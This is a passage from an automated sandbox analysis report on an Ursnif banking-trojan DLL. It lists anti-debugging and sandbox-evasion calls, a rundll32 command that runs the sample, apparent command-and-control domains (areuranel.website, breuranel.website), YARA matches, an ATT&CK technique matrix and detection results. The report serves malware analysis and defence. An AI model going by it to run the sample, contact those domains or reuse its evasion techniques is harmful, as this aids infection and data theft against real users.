                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000013.00000003.524969424.0000000004A35000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: WerFault.exe, 00000012.00000002.526051488.0000000005320000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.524764769.0000000004A1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.545662496.0000000004CD8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000017.00000002.545508557.0000000004C02000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW~
                      Source: WerFault.exe, 00000012.00000002.526349700.0000000005348000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED48861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED8DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED8DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED8DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED3C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED48861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED8DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED8DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED8DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED1B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED1B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.98.208.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.9.178 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSVirtualization/Sandbox Evasion1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 500309 Sample: 6yDD19jMIu.dll Startdate: 11/10/2021 Architecture: WINDOWS Score: 96 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected  Ursnif 2->48 7 loaddll32.exe 1 2->7         started        process3 dnsIp4 36 breuranel.website 7->36 38 areuranel.website 7->38 40 10 other IPs or domains 7->40 52 Writes or reads registry keys via WMI 7->52 54 Writes registry values via WMI 7->54 11 rundll32.exe 7->11         started        14 cmd.exe 1 7->14         started        16 rundll32.exe 7->16         started        18 rundll32.exe 7->18         started        signatures5 process6 signatures7 56 System process connects to network (likely due to code injection or exploit) 11->56 58 Writes registry values via WMI 11->58 20 WerFault.exe 23 9 11->20         started        22 rundll32.exe 14->22         started        26 WerFault.exe 2 9 16->26         started        28 WerFault.exe 9 18->28         started        process8 dnsIp9 30 40.101.9.178, 443, 49790 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->30 32 52.98.208.66, 443, 49789 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->32 34 11 other IPs or domains 22->34 50 System process connects to network (likely due to code injection or exploit) 22->50 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      6yDD19jMIu.dll9%VirustotalBrowse
                      6yDD19jMIu.dll5%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.750000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.12b0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      areuranel.website7%VirustotalBrowse
                      breuranel.website7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://mem.gfx.ms/meversion/?partner=msn&market=en-us"0%Avira URL Cloudsafe
                      https://watson.telemetry.microsoftv0%Avira URL Cloudsafe
                      https://blogs.msn.co0%Avira URL Cloudsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://web.vortex.d0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      		13.82.28.61
                      		truefalse
                        		high
                        outlook.com
                        		40.97.161.50
                        		truefalse
                          		high
                          HHN-efz.ms-acdc.office.com
                          		52.98.152.242
                          		truefalse
                            		high
                            FRA-efz.ms-acdc.office.com
                            		52.97.137.242
                            		truefalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.outlook.com
                                		unknown
                                		unknownfalse
                                  		high
                                  areuranel.website
                                  		unknown
                                  		unknowntrueunknown
                                  breuranel.website
                                  		unknown
                                  		unknowntrueunknown
                                  outlook.office365.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
